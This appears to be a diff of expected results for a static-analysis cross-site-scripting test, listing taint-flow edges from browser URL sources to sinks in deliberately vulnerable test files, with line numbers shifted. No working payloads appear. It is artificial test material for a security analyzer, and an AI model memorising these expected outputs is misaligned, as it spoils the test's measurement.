| location | tst.js:310:10:310:10 | e | provenance | | -| tst.js:310:10:310:10 | e | tst.js:311:20:311:20 | e | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams] | provenance | | -| tst.js:331:7:331:43 | params | tst.js:332:18:332:23 | params | provenance | | -| tst.js:331:7:331:43 | params [MapValue] | tst.js:332:18:332:23 | params [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:331:16:331:43 | getTain ... hParams [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | tst.js:331:16:331:43 | getTain ... hParams | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams | tst.js:331:7:331:43 | params | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | tst.js:331:7:331:43 | params [MapValue] | provenance | | -| tst.js:332:18:332:23 | params | tst.js:332:18:332:35 | params.get('name') | provenance | Config | -| tst.js:332:18:332:23 | params [MapValue] | tst.js:332:18:332:35 | params.get('name') | provenance | | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | tst.js:343:5:343:12 | getUrl() [hash] | provenance | | -| tst.js:341:20:341:36 | document.location | tst.js:341:12:341:37 | new URL ... cation) [hash] | provenance | | -| tst.js:343:5:343:12 | getUrl() [hash] | tst.js:343:5:343:17 | getUrl().hash | provenance | | -| tst.js:343:5:343:17 | getUrl().hash | tst.js:343:5:343:30 | getUrl( ... ring(1) | provenance | Config | -| tst.js:348:7:348:39 | target | tst.js:349:12:349:17 | target | provenance | | -| tst.js:348:16:348:39 | documen ... .search | tst.js:348:7:348:39 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:356:16:356:21 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:355:19:355:42 | documen ... .search | tst.js:355:10:355:42 | target | provenance | | -| tst.js:356:16:356:21 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:360:21:360:26 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:363:18:363:23 | target | provenance | | -| tst.js:371:7:371:39 | target | tst.js:374:18:374:23 | target | provenance | | -| tst.js:371:16:371:39 | documen ... .search | tst.js:371:7:371:39 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:384:18:384:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:386:18:386:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:397:18:397:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:406:18:406:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:408:19:408:24 | target | provenance | | -| tst.js:381:16:381:39 | documen ... .search | tst.js:381:7:381:39 | target | provenance | | -| tst.js:386:18:386:23 | target | tst.js:386:18:386:29 | target.taint | provenance | | -| tst.js:391:3:391:8 | [post update] target [taint3] | tst.js:392:18:392:23 | target [taint3] | provenance | | -| tst.js:391:19:391:42 | documen ... .search | tst.js:391:3:391:8 | [post update] target [taint3] | provenance | | -| tst.js:392:18:392:23 | target [taint3] | tst.js:392:18:392:30 | target.taint3 | provenance | | -| tst.js:397:18:397:23 | target | tst.js:397:18:397:30 | target.taint5 | provenance | | -| tst.js:406:18:406:23 | target | tst.js:406:18:406:30 | target.taint7 | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:408:19:408:24 | target [taint8] | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:409:18:409:23 | target [taint8] | provenance | | -| tst.js:408:19:408:24 | target | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:24 | target [taint8] | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:31 | target.taint8 | tst.js:408:3:408:8 | [post update] target [taint8] | provenance | | -| tst.js:409:18:409:23 | target [taint8] | tst.js:409:18:409:30 | target.taint8 | provenance | | -| tst.js:416:7:416:46 | payload | tst.js:417:18:417:24 | payload | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | Config | -| tst.js:416:17:416:46 | window. ... bstr(1) | tst.js:416:7:416:46 | payload | provenance | | -| tst.js:419:7:419:55 | match | tst.js:421:20:421:24 | match | provenance | | -| tst.js:419:15:419:34 | window.location.hash | tst.js:419:15:419:55 | window. ... (\\w+)/) | provenance | | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | tst.js:419:7:419:55 | match | provenance | | -| tst.js:421:20:421:24 | match | tst.js:421:20:421:27 | match[1] | provenance | | -| tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:48 | window. ... it('#') [1] | provenance | Config | -| tst.js:424:18:424:48 | window. ... it('#') [1] | tst.js:424:18:424:51 | window. ... '#')[1] | provenance | | -| tst.js:428:7:428:39 | target | tst.js:430:18:430:23 | target | provenance | | -| tst.js:428:16:428:39 | documen ... .search | tst.js:428:7:428:39 | target | provenance | | -| tst.js:430:18:430:23 | target | tst.js:430:18:430:89 | target. ... data>') | provenance | | -| tst.js:436:6:436:38 | source | tst.js:440:28:440:33 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:441:33:441:38 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:442:34:442:39 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:443:41:443:46 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:444:44:444:49 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:445:32:445:37 | source | provenance | | -| tst.js:436:15:436:38 | documen ... .search | tst.js:436:6:436:38 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:455:18:455:23 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:456:36:456:41 | source | provenance | | -| tst.js:453:16:453:39 | documen ... .search | tst.js:453:7:453:39 | source | provenance | | -| tst.js:456:36:456:41 | source | tst.js:456:18:456:42 | ansiToH ... source) | provenance | | -| tst.js:460:6:460:38 | source | tst.js:463:21:463:26 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:465:19:465:24 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:467:20:467:25 | source | provenance | | -| tst.js:460:15:460:38 | documen ... .search | tst.js:460:6:460:38 | source | provenance | | -| tst.js:471:7:471:46 | url | tst.js:473:19:473:21 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:474:26:474:28 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:475:25:475:27 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:476:20:476:22 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:486:22:486:24 | url | provenance | | -| tst.js:471:13:471:36 | documen ... .search | tst.js:471:13:471:46 | documen ... bstr(1) | provenance | Config | -| tst.js:471:13:471:46 | documen ... bstr(1) | tst.js:471:7:471:46 | url | provenance | | -| tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | provenance | Config | -| tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | provenance | Config | -| tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | provenance | | -| tst.js:508:7:508:39 | target | tst.js:509:18:509:23 | target | provenance | | -| tst.js:508:16:508:39 | documen ... .search | tst.js:508:7:508:39 | target | provenance | | -| tst.js:509:18:509:23 | target | tst.js:509:18:509:54 | target. ... "), '') | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | Config | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | Config | +| tst.js:9:28:9:33 | target | tst.js:9:5:9:42 | '
' | provenance | Config | +| tst.js:14:7:14:56 | params | tst.js:15:18:15:23 | params | provenance | | +| tst.js:14:7:14:56 | params [MapValue] | tst.js:15:18:15:23 | params [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | tst.js:14:16:14:56 | (new UR ... hParams | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams | tst.js:14:7:14:56 | params | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | tst.js:14:7:14:56 | params [MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams] | provenance | | +| tst.js:15:18:15:23 | params | tst.js:15:18:15:35 | params.get('name') | provenance | Config | +| tst.js:15:18:15:23 | params [MapValue] | tst.js:15:18:15:35 | params.get('name') | provenance | | +| tst.js:17:7:17:61 | searchParams | tst.js:18:18:18:29 | searchParams | provenance | | +| tst.js:17:7:17:61 | searchParams [MapValue] | tst.js:18:18:18:29 | searchParams [MapValue] | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) | tst.js:17:7:17:61 | searchParams | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | tst.js:17:7:17:61 | searchParams [MapValue] | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:18:18:18:29 | searchParams | tst.js:18:18:18:41 | searchP ... 'name') | provenance | Config | +| tst.js:18:18:18:29 | searchParams [MapValue] | tst.js:18:18:18:41 | searchP ... 'name') | provenance | | +| tst.js:21:14:21:19 | target | tst.js:22:18:22:23 | target | provenance | | +| tst.js:24:5:24:28 | documen ... .search | tst.js:21:14:21:19 | target | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:48:26:48:30 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | provenance | | +| tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
" ...
" | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
" ...
" | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
" ...
" | provenance | Config | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | Config | +| tst.js:41:15:41:15 | s | tst.js:43:12:43:12 | s | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | Config | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | Config | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | Config | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | Config | +| tst.js:50:34:50:34 | s | tst.js:51:18:51:18 | s | provenance | | +| tst.js:53:25:53:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:54:25:54:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:58:1:58:27 | [,docum ... search] [1] | tst.js:58:46:58:46 | x | provenance | | +| tst.js:58:3:58:26 | documen ... .search | tst.js:58:1:58:27 | [,docum ... search] [1] | provenance | | +| tst.js:58:46:58:46 | x | tst.js:60:20:60:20 | x | provenance | | +| tst.js:93:7:93:44 | v | tst.js:95:18:95:18 | v | provenance | | +| tst.js:93:7:93:44 | v | tst.js:120:18:120:18 | v | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | Config | +| tst.js:93:11:93:44 | documen ... bstr(1) | tst.js:93:7:93:44 | v | provenance | | +| tst.js:132:29:132:50 | window. ... .search | tst.js:135:29:135:29 | v | provenance | | +| tst.js:135:29:135:29 | v | tst.js:135:49:135:49 | v | provenance | | +| tst.js:142:40:142:61 | window. ... .search | tst.js:139:29:139:46 | xssSourceService() | provenance | | +| tst.js:161:9:161:41 | target | tst.js:164:28:164:33 | target | provenance | | +| tst.js:161:18:161:41 | documen ... .search | tst.js:161:9:161:41 | target | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:170:31:170:37 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:172:42:172:48 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:173:33:173:39 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:175:54:175:60 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:176:45:176:51 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:177:49:177:55 | tainted | provenance | | +| tst.js:168:19:168:42 | documen ... .search | tst.js:168:9:168:42 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:183:67:183:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:181:19:181:42 | documen ... .search | tst.js:181:9:181:42 | tainted | provenance | | +| tst.js:183:67:183:73 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:188:35:188:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:190:46:190:52 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:191:38:191:44 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:192:35:192:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:188:35:188:41 | tainted | tst.js:196:28:196:46 | this.state.tainted1 | provenance | | +| tst.js:190:46:190:52 | tainted | tst.js:197:28:197:46 | this.state.tainted2 | provenance | | +| tst.js:191:38:191:44 | tainted | tst.js:198:28:198:46 | this.state.tainted3 | provenance | | +| tst.js:192:35:192:41 | tainted | tst.js:202:32:202:49 | prevState.tainted4 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:209:28:209:46 | this.props.tainted1 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:210:28:210:46 | this.props.tainted2 | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:211:28:211:46 | this.props.tainted3 | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:215:32:215:49 | prevProps.tainted4 | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:231:39:231:55 | props.propTainted | tst.js:235:60:235:82 | this.st ... Tainted | provenance | | +| tst.js:239:23:239:29 | tainted | tst.js:231:39:231:55 | props.propTainted | provenance | | +| tst.js:269:9:269:29 | tainted | tst.js:272:59:272:65 | tainted | provenance | | +| tst.js:269:19:269:29 | window.name | tst.js:269:9:269:29 | tainted | provenance | | +| tst.js:285:9:285:16 | location | tst.js:286:10:286:10 | e | provenance | | +| tst.js:286:10:286:10 | e | tst.js:287:20:287:20 | e | provenance | | +| tst.js:292:10:292:17 | location | tst.js:294:10:294:10 | e | provenance | | +| tst.js:294:10:294:10 | e | tst.js:295:20:295:20 | e | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams] | provenance | | +| tst.js:315:7:315:43 | params | tst.js:316:18:316:23 | params | provenance | | +| tst.js:315:7:315:43 | params [MapValue] | tst.js:316:18:316:23 | params [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:315:16:315:43 | getTain ... hParams [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | tst.js:315:16:315:43 | getTain ... hParams | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams | tst.js:315:7:315:43 | params | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | tst.js:315:7:315:43 | params [MapValue] | provenance | | +| tst.js:316:18:316:23 | params | tst.js:316:18:316:35 | params.get('name') | provenance | Config | +| tst.js:316:18:316:23 | params [MapValue] | tst.js:316:18:316:35 | params.get('name') | provenance | | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | tst.js:327:5:327:12 | getUrl() [hash] | provenance | | +| tst.js:325:20:325:36 | document.location | tst.js:325:12:325:37 | new URL ... cation) [hash] | provenance | | +| tst.js:327:5:327:12 | getUrl() [hash] | tst.js:327:5:327:17 | getUrl().hash | provenance | | +| tst.js:327:5:327:17 | getUrl().hash | tst.js:327:5:327:30 | getUrl( ... ring(1) | provenance | Config | +| tst.js:332:7:332:39 | target | tst.js:333:12:333:17 | target | provenance | | +| tst.js:332:16:332:39 | documen ... .search | tst.js:332:7:332:39 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:340:16:340:21 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:339:19:339:42 | documen ... .search | tst.js:339:10:339:42 | target | provenance | | +| tst.js:340:16:340:21 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:344:21:344:26 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:347:18:347:23 | target | provenance | | +| tst.js:355:7:355:39 | target | tst.js:357:18:357:23 | target | provenance | | +| tst.js:355:16:355:39 | documen ... .search | tst.js:355:7:355:39 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:367:18:367:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:369:18:369:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:380:18:380:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:389:18:389:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:391:19:391:24 | target | provenance | | +| tst.js:364:16:364:39 | documen ... .search | tst.js:364:7:364:39 | target | provenance | | +| tst.js:369:18:369:23 | target | tst.js:369:18:369:29 | target.taint | provenance | | +| tst.js:374:3:374:8 | [post update] target [taint3] | tst.js:375:18:375:23 | target [taint3] | provenance | | +| tst.js:374:19:374:42 | documen ... .search | tst.js:374:3:374:8 | [post update] target [taint3] | provenance | | +| tst.js:375:18:375:23 | target [taint3] | tst.js:375:18:375:30 | target.taint3 | provenance | | +| tst.js:380:18:380:23 | target | tst.js:380:18:380:30 | target.taint5 | provenance | | +| tst.js:389:18:389:23 | target | tst.js:389:18:389:30 | target.taint7 | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:391:19:391:24 | target [taint8] | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:392:18:392:23 | target [taint8] | provenance | | +| tst.js:391:19:391:24 | target | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:24 | target [taint8] | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:31 | target.taint8 | tst.js:391:3:391:8 | [post update] target [taint8] | provenance | | +| tst.js:392:18:392:23 | target [taint8] | tst.js:392:18:392:30 | target.taint8 | provenance | | +| tst.js:399:7:399:46 | payload | tst.js:400:18:400:24 | payload | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | Config | +| tst.js:399:17:399:46 | window. ... bstr(1) | tst.js:399:7:399:46 | payload | provenance | | +| tst.js:402:7:402:55 | match | tst.js:404:20:404:24 | match | provenance | | +| tst.js:402:15:402:34 | window.location.hash | tst.js:402:15:402:55 | window. ... (\\w+)/) | provenance | | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | tst.js:402:7:402:55 | match | provenance | | +| tst.js:404:20:404:24 | match | tst.js:404:20:404:27 | match[1] | provenance | | +| tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:48 | window. ... it('#') [1] | provenance | Config | +| tst.js:407:18:407:48 | window. ... it('#') [1] | tst.js:407:18:407:51 | window. ... '#')[1] | provenance | | +| tst.js:411:7:411:39 | target | tst.js:413:18:413:23 | target | provenance | | +| tst.js:411:16:411:39 | documen ... .search | tst.js:411:7:411:39 | target | provenance | | +| tst.js:413:18:413:23 | target | tst.js:413:18:413:89 | target. ... data>') | provenance | | +| tst.js:419:6:419:38 | source | tst.js:423:28:423:33 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:424:33:424:38 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:425:34:425:39 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:426:41:426:46 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:427:44:427:49 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:428:32:428:37 | source | provenance | | +| tst.js:419:15:419:38 | documen ... .search | tst.js:419:6:419:38 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:438:18:438:23 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:439:36:439:41 | source | provenance | | +| tst.js:436:16:436:39 | documen ... .search | tst.js:436:7:436:39 | source | provenance | | +| tst.js:439:36:439:41 | source | tst.js:439:18:439:42 | ansiToH ... source) | provenance | | +| tst.js:443:6:443:38 | source | tst.js:446:21:446:26 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:448:19:448:24 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:450:20:450:25 | source | provenance | | +| tst.js:443:15:443:38 | documen ... .search | tst.js:443:6:443:38 | source | provenance | | +| tst.js:454:7:454:46 | url | tst.js:456:19:456:21 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:457:26:457:28 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:458:25:458:27 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:459:20:459:22 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:469:22:469:24 | url | provenance | | +| tst.js:454:13:454:36 | documen ... .search | tst.js:454:13:454:46 | documen ... bstr(1) | provenance | Config | +| tst.js:454:13:454:46 | documen ... bstr(1) | tst.js:454:7:454:46 | url | provenance | | +| tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | provenance | Config | +| tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | provenance | Config | +| tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | provenance | | +| tst.js:491:7:491:39 | target | tst.js:492:18:492:23 | target | provenance | | +| tst.js:491:16:491:39 | documen ... .search | tst.js:491:7:491:39 | target | provenance | | +| tst.js:492:18:492:23 | target | tst.js:492:18:492:54 | target. ... "), '') | provenance | | | typeahead.js:9:28:9:30 | loc | typeahead.js:10:16:10:18 | loc | provenance | | | typeahead.js:20:13:20:45 | target | typeahead.js:21:12:21:17 | target | provenance | | | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:20:13:20:45 | target | provenance | | @@ -1248,18 +1248,18 @@ subpaths | optionalSanitizer.js:41:28:41:35 | tainted3 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | | optionalSanitizer.js:45:41:45:46 | target | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | | tooltip.jsx:18:51:18:57 | provide [source] | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:18:51:18:59 | provide() | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | tst.js:40:16:40:44 | baz(doc ... search) | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
" ...
" | tst.js:46:16:46:45 | wrap(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
" ...
